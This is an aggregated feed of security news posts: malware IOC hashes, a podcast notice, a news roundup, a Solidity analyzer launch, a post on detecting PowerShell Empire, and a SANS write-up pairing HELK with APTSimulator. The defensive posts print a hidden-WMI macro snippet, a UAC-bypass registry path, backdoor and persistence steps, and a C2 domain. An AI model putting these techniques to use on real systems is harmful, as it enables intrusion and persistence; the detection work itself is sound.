  • %SystemDrive%\I386\SPNPINST.EXE
  • %SystemDrive%\I386\SYSTEM32\SMSS.EXE
  • %SystemDrive%\I386\TELNET.EXE
  • %ProgramFiles%\AutoIt3\SciTE\SciTE.exe
  • %ProgramFiles%\FileZilla FTP Client\filezilla.exe
  • %ProgramFiles%\Windows Media Player\wmplayer.exe
  • %ProgramFiles%\Windows NT\Accessories\wordpad.exe
  • %ProgramFiles%\Windows NT\Pinball\pinball.exe
  • %ProgramFiles%\Windows NT\dialer.exe
  • %ProgramFiles%\Windows NT\hypertrm.exe
File Hashes
  • 0011723df3b26754ca4ca2eceb09c499aae2c5cc4db928d7727b67c60e577139
  • 002095eb7f10ae09be653040d140ffa762a320afab5185852b7d41b52db61c6a
  • 004c07dd0fa5fad4fe4900cc2ef6bd1b2abb5af3bbcbb2e139b4ff322d4078df
  • 007c2a5cf0f4015a86245231df3d7852a2f65f983b81a4df0dead1085b89a0ed
  • 00eb80745eaf40fc6a96bfcf4e03947beb4fa89a12773dc2aa739ce3777b7678
  • 00ec92b171c50fc7f78b787ce2b441cc2c753d662e25e7d5fcc05e4675bad287
  • 011ef040200e15408460db169067da640b78eba15fad117b28f46b50532c5598
  • 0147aa37821a3897110ed304ec26a1ab06291f59bb0c358de00ad1692ab4ea11
  • 017ddae8c3e44d1b99cba912a1513065ae9883ed63b955297f9ce1dbbf5ffcfc
  • 02ae5aa484fe0a9ddbd128ef9dc13cbd8c8e6880f766a106bae88c783a86583b
  • 02f261c939842a80b16a4a58c91cec0e787e48f190e3e8f6363c4784df122763
  • 0341342a42497c4d2b6886d7ab770a529e266b60c438ad783a615b18c635714c
  • 04078fdc1594bdebbf36b02005c798a8d71e8fb2a4211ffd2fa6653a780ccb99
  • 041f132694ac497b5a0390928f1b5f45e8a1b407d7f33b5d56c4fcaef00d1e1e
  • 043db96315c845bdf388ef63ab097742ad9268b96ca78d6e8565b1a32f551892
  • 04bb15f07d48249864ed7d67485c15c9a90b141299fed80c2cc44ae60d05cfd7
  • 0541a1b37978cf9060e322597f35351d2429dfaf11707092a96743169e4e160f
  • 05aa9a9452f4c1c8a0ee90b6e9d7ce285a4773e171d0fd76c96e57d932243397
  • 05c83511d79d813e563085a8e8b950a20c28bfc5f546ae5e910da25d1cf3a9c3
  • 06261bfb80aa502c1b35d9a0ed627e79f25dca958a32520ea7b3ddaeb98d033e
  • 062eb62bdc94deeba133a244f40b449d7c79dbfd621a95b1dc4daf5405b26650
  • 0630c559b0d079b457072e6fafc912739f57921e84430ba903034b98f688052e
  • 069d85b9fca5faebe3d65e66fc385f208adc02dc2d937e8f73a0683cc5edd1a3
  • 06db79ae47b5da5da9afe655e67805a069fb9b1ccac54d8c21e6bba3390299e0
  • 07a37e10b07767b08e125bbf6d35b5926fdda391faf5d4d9a11dde4014917484

Coverage
Screenshots of DetectionAMP



ThreatGrid




Categories: Security Posts

Beers with Talos EP 39: VB 2018 Rundown and Prevalent Problems with PDF

Cisco Talos - Fri, 2018/10/19 - 18:37


Beers with Talos (BWT) Podcast Ep. #39 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.
Ep. #39 show notes: Recorded Oct. 5, 2018 - We start out with a quick chat to get to know this week’s special guests from the Talos Outreach team: Paul Rascagneres, Vanja Svajcer and Warren Mercer. We discuss everyone’s work that was presented at Virus Bulletin, as well as Paul and Warren being nominated for the Péter Szőr Award. We also cover a lot of vulnerability discovery work that we recently released around various PDF software.
The timeline:The topics01:25 - Roundtable - Intros with our special guests Warren Mercer, Vanja Svajcer and Paul Rascagneres.
07:01 - Virus Bulletin and Korea in the Crosshairs nominated for Péter Szőr Award
22:42 - Other Talos talks and internet-of-things nonsense
28:39 - PDF vulnerabilities and how vulnerabilities can come in batches
35:23 - Closing thoughts and parting shots
The linksPéter Szőr Award: https://www.virusbulletin.com/conference/peter-szor-award/
Talos PDF vulnerability posts: https://blog.talosintelligence.com/search?q=pdf&by-date=true
==========

Featuring: Nigel Houghton (@EnglishLFC). Special guests: Warren Mercer (@SecurityBeard), Paul Rascagneres (@R00tBSD), and Vanja Svajcer (@VanjaSvajcer). Hosted by Mitch Neff (@MitchNeff).

Find all episodes here.

Subscribe via iTunes (and leave a review!)

Check out the Talos Threat Research Blog

Subscribe to the Threat Source newsletter

Follow Talos on Twitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com
Categories: Security Posts

Historical OSINT - iPowerWeb Hacked Hundreds of Web Sites Affected

In 2008 it became evident that a widespread malware-embedded attack took place successfully affecting hundreds of iPowerWeb customers potentially exposing hundreds of legitimate Web sites to a multi-tude of malicious software courtesy of a well known Russian Business Network's hosting provider - HostFresh. In this post we'll profile the campaign provide actionable intelligence on the
Categories: Security Posts

Things I Hearted this Week, 19th October 2018

AlienVault Blogs - Fri, 2018/10/19 - 15:00
It’s been another eventful week in the world of cyber security. So let’s just jump right into it. NCSC has Been Busy NCSC collaborated with Australia, Canada, New Zealand, UK, and the USA to give us a report that highlights which publicly-available tools criminals are using to aid their cyber crimes. The agency also commented on how it keeps criminals at bay by stopping on average 10 attacks on the government per week. NCSC also published its Annual Review 2018 - the story of the second year of operations at the National Cyber Security Centre. Targeting Crypto Currencies It is estimated that cryptocurrency exchanges suffered a total loss of $882 million due to targeted attacks in 2017 and in the first three quarters of 2018. According to Group-IB experts, at least 14 crypto exchanges were hacked. Five attacks have been linked to North Korean hackers from Lazarus state-sponsored group, including the infamous attack on Japanese crypto exchange Coincheck, when $534 million in crypto was stolen. Twitter Publishes Data on Iranian and Russian Troll Farms In an attempt to try and be more proactive in dealing with misinformation campaigns, Twitter has published its Elections Integrity dataset which includes attempted manipulation, including malicious automated accounts and spam. In other words it’s attempting to out - Iranian and Russian troll farms. In light of this, it’s worth also revisiting this article by Mustafa Al-Bassam in which he researched UK intelligence doing the same thing targeting civilians in Iran. Equifax Engineer Sentenced An Equifax engineer gets eight months for earning $75,000 from insider trading. He figured out he was building a web portal for a breach involving Equifax, which turned out to be the 2017 breach, and so decided to ride the stock drop. Mind the Skills Gap (ISC)2 has released its 2018 global cyber security workforce study and it looks like the cyber security skills gap has widened to 3 million. It’s worth bearing in mind that estimating the skills gap isn’t an easy task. You have to look into the types of organisations, the tools in place, the risk appetite, economic, political, environmental factors, a whole bunch of things. You need a pretty deep methodology (don’t get me started on survey methodologies) to accurately assess the skills gap - so, a survey of 1500 individuals won’t necessarily be completely accurate, but serves as a good discussion point to start from. On the topic of the skills gap, there are plenty of free resources for learning available these days. Check out this awesome list: GitHub Announcements When Microsoft acquired GitHub, many speculated this was the end of the site. However, on the contrary, a series of new features and enhancements shows GitHub ploughing forward in leaps and bounds. California to Change State Law for Connected Devices In a bid to strengthen cyber security, California passed a state law requiring all manufacturers of internet connected devices to improve their security features. By 2020, in order to sell their products in California, manufacturers will need to ensure that devices such as home routers have a unique pre-programed password or an enforced user authentication process as part of the set up. Default passwords such as ‘password’ or ‘default’ will be deemed weak and in breach of the state law. A great initiative, but part of me feels like it’s a bit premature. Why tech companies need to reinvent themselves every three to four years Former Cisco CEO John Chambers says doing the same thing, even if it’s the “right thing,” for too long is dangerous. The CumEx Files investigation Finally, a long, but fascinating read into a huge, months-long investigation that involved the cooperation of dozens of international partners to uncover how some of the wealthiest have swindled European taxpayers of billions.
Categories: Security Posts

Slither – a Solidity static analysis framework

Slither is the first open-source static analysis framework for Solidity. Slither is fast and precise; it can find real vulnerabilities in a few seconds without user intervention. It is highly customizable and provides a set of APIs to inspect and analyze Solidity code easily. We use it in all of our security reviews. Now you can integrate it into your code-review process. We are open sourcing the core analysis engine of Slither. This core provides advanced static-analysis features, including an intermediate representation (SlithIR) with taint tracking capabilities on top of which complex analyses (“detectors”) can be built. We have built many detectors, including ones that detect reentrancy and suicidal contracts. We are open sourcing some as examples. If you are a smart-contract developer, a security expert, or an academic researcher, then you will find Slither invaluable. Built for continuous integration Slither has a simple command line interface. To run all of its detectors on a Solidity file, this is all you need: $ slither contract.sol You can integrate Slither into your development process without any configuration. Run it on each commit to check that you are not adding new bugs. Helps automate security reviews Slither provides an API to inspect Solidity code via custom scripts. We use this API to rapidly answer unique questions about the code we’re reviewing. We have used Slither to:
  • Identify code that can modify a variable’s value.
  • Isolate the conditional logic statements that are influenced by a particular variable’s value.
  • Find other functions that are transitively reachable as a result of a call to a particular function.
For example, the following script will show which function(s) in myContract write to the state variable myVar: # function_writing.py import sys from slither.slither import Slither if len(sys.argv) != 2: print('python.py function_writing.py file.sol') exit(-1) # Init slither slither = Slither(sys.argv[1]) # Get the contract contract = slither.get_contract_from_name('myContract') # Get the variable myVar = contract.get_state_variable_from_name('myVar') # Get the functions writing the variable funcs_writing_myVar = contract.get_functions_writing_to_variable(myVar) # Print the result print('Functions that write to "myVar": {}'.format([f.name for f in funcs_writing_myVar])) Figure 1: Slither API Example Read the API documentation and the examples to start harnessing Slither. Aids in understanding contracts Slither comes with a set of predefined “printers” which show high-level information about the contract. We included four that work out-of-the-box to print essential security information: a contract summary, a function summary, a graph of inheritance, and an authorization overview. 1. Contract summary printer Gives a quick summary of the contract, showing the functions and their visibility: Figure 2: Contract Summary Printer 2. Function summary printer Shows useful information for each function, such as the state variables read and written, or the functions called: Figure 3: Function Summary Printer 3. Inheritance printer Outputs a graph highlighting the inheritance dependencies of all the contracts: Figure 3: Function Summary Printer 4. Authorization printer Shows what a user with privileges can do on the contract: Figure 4: Authorization Printer See Slither’s documentation for information about adding your own printers. A foundation for research Slither uses its own intermediate representation, SlithIR, to build innovative vulnerability analyses on Solidity. It provides access to the CFG of the functions, the inheritance of the contracts, and lets you inspect Solidity expressions. Many academic tools, such as Oyente or MAIAN, advanced the start of the art when they were released. However, each academic team had to invent their own framework, built for only the limited scope of their particular area of interest. Maintenance became a challenge quickly. In contrast, Slither is a generic framework. Because it’s capable of the widest possible range of security analyses, it is regularly maintained and used by our open source community. If you are an academic researcher, don’t spend time and effort parsing and recovering information from smart contracts. Prototype your new innovations on top of Slither, complete your research sooner, and ensure it maintains its utility over time. It’s easy to extend Slither’s capabilities with new detector plugins. Read the detector documentation to start writing your own. Next steps Slither can find real vulnerabilities in a few seconds with minimal or no user interaction. We use it on all of our Solidity security reviews. You should too! Many of our ongoing projects will improve Slither, including:
  • API enhancements: Now that we have open sourced the core, we intend to provide the most effective static analysis framework possible.
  • More precise built-in analyses: We plan to make several new layers of information, such as value tracking, accessible to the API.
  • Toolchain integration: We plan to combine Slither with Manticore, Echidna, and Truffle to automate the triage of issues.
Questions about Slither’s API and its core framework? Join the Empire Hacking Slack. Need help integrating Slither into your development process? Want access to our full set of detectors? Contact us.
Categories: Security Posts

Detecting Empire with USM Anywhere

AlienVault Blogs - Thu, 2018/10/18 - 20:13
Empire is an open source post-exploitation framework that acts as a capable backdoor on infected systems.  It provides a management platform for infected machines. Empire can deploy PowerShell and Python agents to infect both Windows and Linux systems. Empire can:
  • Deploy fileless agents to perform command and control.
  • Exploit vulnerabilities to escalate privileges.
  • Install itself for persistence.
  • Steal user credentials.
It has also evolved to support the initial attack phases of an attack, and can create malicious documents to deploy its agent. Empire’s features are classified into listeners, stagers and modules. Below, we describe how AlienVault USM can detect these stages below on a Windows target. Staging Empire first attempts to deploy an agent using one of multiple stager modules. USM will generically detect the agent after Powershell is invoked with an encoded payload. Commands executed with encoded arguments are commonly used by attackers as an obfuscation technique, so they produce the USM alert ‘Defense Evasion - Obfuscated Command - Powershell Execution of Encoded Command’: This alert detects most Empire stagers on Windows, when they use Powershell to executed an encoded command. If enabled, the Windows Antimalware Scan Interface should also block the PowerShell command.  The ‘Malware Infection - Windows Defender Malware Detected’ alert, shows the necessary information to locate the malicious file: An alternative for an attacker is to craft an Office document with a macro, which will execute the agent command by running a crafted Windows process from the WMI Service: Set objWMIService = GetObject("winmgmts:\\.\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = 0 Set objProcess = GetObject("winmgmts:\\.\root\cimv2:Win32_Process") objProcess.Create str, Null, objConfig, intProcessID When the macro runs, the Windows Management Instrumentation Command will create a new process. USM will listen the Windows events to detect the WMIC call, commonly used in lateral movement scenarios. The ‘Lateral Movement - Remote WMIC Activity’ alert will raise displaying the malicious Powershell command: Another way for an attacker to implant the Empire agent into their victims machine is to create a HTML Application using the Empire module windows/hta. In weak security configuration system, a simple spear phishing mail with a link to the crafted HTML application will be enough to get the agent running. For each alert, the USM provides detailed information about the nature of the issue and useful recommendations for the security staff to follow: As this is a common technique for installing malware, USM identifies applications such as Powershell executed by HTML Applications. In this instance, USM creates an alarm for ‘Code Execution - Suspicious Process Created by mshta.exe’: Escalating Privileges After infection, the attacker will try to escalate privileges. For that, they can use one of the ‘privesc’ Empire modules. One of the most dangerous will try to bypass Windows UAC by abusing the native Event Viewer. When Event Viewer runs, it tries to execute mmc.exe from  HKCU\Software\Classes\mscfile\shell\open\command registry. Thus, an attacker can use that location to place a process that will run with high level integrity. Trying this would result in a registry key hijack attempt, that is detected by AlienVault agent and deployed in USM with a ‘Privilege Escalation - Windows UAC Bypass’ alert: Empire C&C
The Empire agent will access the network through a crafted powershell command. Although this command combines a number of obfuscation techniques (such as case switching) and Base64 encoding, some features in its structure are invariant and allow for detection. When the decoded command is registered by ‘Windows Powershell Login Channel’ and sent to the USM engine, it will trigger a ‘Hacking Tool - Powershell Empire agent CnC activity’ alert announcing that Empire has been detected on the machine: Other features The Empire framework also provides several modules to enable persistence on the infected machine such as: scheduled tasks, a number of registry keys, or WMI event subscriptions. USM Anywhere alerts of each scheduled task with a low priority alarm: These alerts provide full information about the task content, responsible user, and other key data. To steal system credentials, an attacker can also rely on Empire modules. The mimikatz module can operate after a high privileges agent is installed in the victim’s machine. Executing mimikatz leverages an iterative file listing process easy to detect with USM: The alert  ‘Credential Access - Powershell script executing mimikatz’ deploys the command and other interesting data. Empire also uses registry keys for persistence. Some interesting registries to monitor with USM are SOFTWARE\Microsoft\Windows\CurrentVersion\Run and SOFTWARE\Microsoft\Windows\CurrentVersion\Debug. Thanks Chris Doman for collaboration Appendix Host detection Empire is detected as it is installed and executed on a machine with the following detections: Malware Infection - Windows Defender Malware Detected Defense Evasion - Obfuscated Command - Powershell Execution of Encoded Command Code Execution - Suspicious Process Created by mshta.exe Privilege Escalation - Windows UAC Bypass Hacking Tool - Powershell Empire agent CnC Activity Credential Access - Powershell script executing mimikatz Security Critical Event - Windows Scheduled Job Created Network detection Empire is detected as it communicates over the network via the following network detections: ETPRO TROJAN Observed PS Empire Downloader SSL Cert via MalDoc Oct 20 ETPRO TROJAN PowerShell Empire Request HTTP Pattern ETPRO TROJAN PowerShell Empire Response HTTP Pattern ETPRO TROJAN PowerShell Empire Malicious SSL Certificate Detected ETPRO TROJAN PowerShell Empire SSL Cert ETPRO TROJAN Receiving Possible PowerShell Empire Stager ETPRO CURRENT_EVENTS PowerShell Empire Session via MSOffice Doc Macro ETPRO CURRENT_EVENTS PowerShell Empire Session Initial Activity ETPRO CURRENT_EVENTS PowerShell Empire Session via Excel Macro
Categories: Security Posts

Pattern Welding Explained as Wearable Art

Niels Provos - Tue, 2018/08/28 - 06:37

Pattern-Welding was used throughout the Viking-age to imbue swords with intricate patterns that were associated with mystical qualities. This visualization shows the pattern progression in a twisted road with increasing removal of material. It took me two years of intermittent work to get to this image. I liked this image so much that I ordered it for myself as a t-shirt and am looking forward for people asking me what the image is all about. If you want to get a t-shirt yourself, you can order this design via RedBubble. If you end up ordering a t-shirt, let me know if it ends up getting you into any interesting conversations!

Categories: Security Posts

An Elaborate Hack Shows How Much Damage IoT Bugs Can Do

Wired: Security - Mon, 2018/04/16 - 19:00
Rube-Goldbergesque IoT hacks are surprisingly simple to pull off—and can do a ton of damage.
Categories: Security Posts

How Russian Facebook Ads Divided and Targeted US Voters Before the 2016 Election

Wired: Security - Mon, 2018/04/16 - 15:00
New research shows just how prevalent political advertising was from suspicious groups in 2016—including Russian trolls.
Categories: Security Posts

Infocon: green

SANS Internet Storm Center, InfoCON: green - Fri, 2018/04/06 - 17:46
ISC Stormcast For Friday, April 6th 2018 https://isc.sans.edu/podcastdetail.html?id=5943
Categories: Security Posts

ISC Stormcast For Friday, April 6th 2018 https://isc.sans.edu/podcastdetail.html&#x3f;id=5943, (Fri, Apr 6th)

SANS Internet Storm Center, InfoCON: green - Fri, 2018/04/06 - 03:30
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

&#x26;#xa;Threat Hunting &#x26; Adversary Emulation: The HELK vs APTSimulator - Part 1, (Thu, Apr 5th)

SANS Internet Storm Center, InfoCON: green - Thu, 2018/04/05 - 19:26

Ladies and gentlemen, for our main attraction, I give you...The HELK vs APTSimulator, in a Death Battle! The late, great Randy "Macho Man" Savage said many things in his day, in his own special way, but "Expect the unexpected in the kingdom of madness!" could be our theme. I'm having a flashback to my college days, many moons ago. :-) The HELK just brought it on. Yes, I know, HELK is the Hunting ELK stack, got it, but it reminded me of the Hulk, and then, I thought of a Hulkamania showdown with APTSimulator, and Randy Savage's classic, raspy voice popped in my head with "Hulkamania is like a single grain of sand in the Sahara desert that is Macho Madness." And that, dear reader, is a glimpse into exactly three seconds or less in the mind of your scribe, a strange place to be certain. But alas, that's how we came up with this fabulous showcase.
In this corner, from Roberto Rodriguez, @Cyb3rWard0g, the specter in SpecterOps, it's...The...HELK! This, my friends, worth every ounce of hype we can muster.
And in the other corner, from Florian Roth, @cyb3rops, the The Fracas of Frankfurt, we have APTSimulator. All your worst adversary apparitions in one APT mic drop. This...is...Death Battle! Now with that out of our system, let's begin. There's a lot of goodness here, so I'm definitely going to do this in two parts so as not undervalue these two offerings.
HELK is incredibly easy to install. Its also well documented, with lots of related reading material, let me propose that you take the tine to to review it all. Pay particular attention to the wiki, gain comfort with the architecture, then review installation steps.
On an Ubuntu 16.04 LTS system I ran:
git clone https://github.com/Cyb3rWard0g/HELK.git
cd HELK/
sudo ./helk_install.sh 
Of the three installation options I was presented with, pulling the latest HELK Docker Image from cyb3rward0g dockerhub, building the HELK image from a local Dockerfile, or installing the HELK from a local bash script, I chose the first and went with the latest Docker image. The installation script does a fantastic job of fulfilling dependencies for you, if you haven't installed Docker, the HELK install script does it for you. You can observe the entire install process in Figure 1. Figure 1: HELK Installation
You can immediately confirm your clean installation by navigating to your HELK KIBANA URL, in my case http://192.168.248.29.
For my test Windows system I created a Windows 7 x86 virtual machine with Virtualbox. The key to success here is ensuring that you install Winlogbeat on the Windows systems from which you'd like to ship logs to HELK. More important, is ensuring that you run Winlogbeat with the right winlogbeat.yml file. You'll want to modify and copy this to your target systems. The critical modification is line 123, under Kafka output, where you need to add the IP address for your HELK server in three spots. My modification appeared as hosts: ["192.168.248.29:9092","192.168.248.29:9093","192.168.248.29:9094"]. As noted in the HELK architecture diagram, HELK consumes Winlogbeat event logs via Kafka.
On your Windows systems, with a properly modified winlogbeat.yml, you'll run:
./winlogbeat -c winlogbeat.yml -e
./winlogbeat setup -e
You'll definitely want to set up Sysmon on your target hosts as well. I prefer to do so with the @SwiftOnSecurity configuration file. If you're doing so with your initial setup, use sysmon.exe -accepteula -i sysmonconfig-export.xml. If you're modifying an existing configuration, use sysmon.exe -c sysmonconfig-export.xml.  This will ensure rich data returns from Sysmon, when using adversary emulation services from APTsimulator, as we will, or experiencing the real deal.
With all set up and working you should see results in your Kibana dashboard as seen in Figure 2.
Figure 2: Initial HELK Kibana Sysmon dashboard.
Now for the showdown. :-) Florian's APTSimulator does some comprehensive emulation to make your systems appear compromised under the following scenarios:
  • POCs: Endpoint detection agents / compromise assessment tools
  • Test your security monitoring's detection capabilities
  • Test your SOCs response on a threat that isn't EICAR or a port scan
  • Prepare an environment for digital forensics classes 
This is a truly admirable effort, one I advocate for most heartily as a blue team leader. With particular attention to testing your security monitoring's detection capabilities, if you don't do so regularly and comprehensively, you are, quite simply, incomplete in your practice. If you haven't tested and validated, don't consider it detection, it's just a rule with a prayer. APTSimulator can be observed conducting the likes of:
  • Creating typical attacker working directory C:\TMP...
  • Activating guest user account
    • Adding the guest user to the local administrators group
  • Placing a svchost.exe (which is actually srvany.exe) into C:\Users\Public
  • Modifying the hosts file
    • Adding update.microsoft.com mapping to private IP address
  • Using curl to access well-known C2 addresses
    • C2: msupdater.com
  • Dropping a Powershell netcat alternative into the APT dir
  • Executes nbtscan on the local network
  • Dropping a modified PsExec into the APT dir
  • Registering mimikatz in At job
  • Registering a malicious RUN key
  • Registering mimikatz in scheduled task
  • Registering cmd.exe as debugger for sethc.exe
  • Dropping web shell in new WWW directory
A couple of notes here.
Download and install APTSimulator from the Releases section of its GitHub pages.
APTSimulator includes curl.exe, 7z.exe, and 7z.dll in its helpers directory. Be sure that you drop the correct version of 7 Zip for your system architecture. I'm assuming the default bits are 64bit, I was testing on a 32bit VM. Let's do a fast run-through with HELK's Kibana Discover option looking for the above mentioned APTSimulator activities. Starting with a search for TMP in the sysmon-* index yields immediate results and strikes #1, 6, 7, and 8 from our APTSimulator list above, see for yourself in Figure 3.
Figure 3: TMP, PS nc, nbtscan, and PsExec in one shot
Created TMP, dropped a PowerShell netcat, nbtscanned the local network, and dropped a modified PsExec, check, check, check, and check.
How about enabling the guest user account and adding it to the local administrator's group? Figure 4 confirms.
Figure 4: Guest enabled and escalated
Strike #2 from the list. Something tells me we'll immediately find svchost.exe in C:\Users\Public. Aye, Figure 5 makes it so.
Figure 5: I've got your svchost right here
Knock #3 off the to-do, including the process.commandline, process.name, and file.creationtime references. Up next, the At job and scheduled task creation. Indeed, see Figure 6.
Figure 6: tasks OR schtasks
I think you get the point, there weren't any misses here. There are, of course, visualization options. Don't forget about Kibana's Timelion feature. Forensicators and incident responders live and die by timelines, use it to your advantage (Figure 7).
Figure 7: Timelion
Finally, under HELK's Kibana Visualize menu, you'll note 34 visualizations. By default, these are pretty basic, but you quickly add value with sub-buckets. As an example, I selected the Sysmon_UserName visualization. Initially, it yielded a donut graph inclusive of malman (my pwned user), SYSTEM and LOCAL SERVICE. Not good enough to be particularly useful I added a sub-bucket to include process names associated with each user. The resulting graph is more detailed and tells us that of the 242 events in the last four hours associated with the malman user, 32 of those were specific to cmd.exe processes, or 18.6% (Figure 8).
Figure 8: Powerful visualization capabilities
I am thrilled with both HELK and APTSimulator. The true principles of blue team and detection quality are innate in these projects. The fact that Roberto considers HELK still in alpha state leads me to believe there is so much more to come. Be sure to dig deeply into APTSimulator's Advanced Solutions as well, there's more than one way to emulate an adversary.
Part 2 will explore HELK integration with Spark, Graphframes & Jupyter notebooks.
Russ McRee | @holisticinfosec (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Security Posts

Thu, 1970/01/01 - 02:00
Syndicate content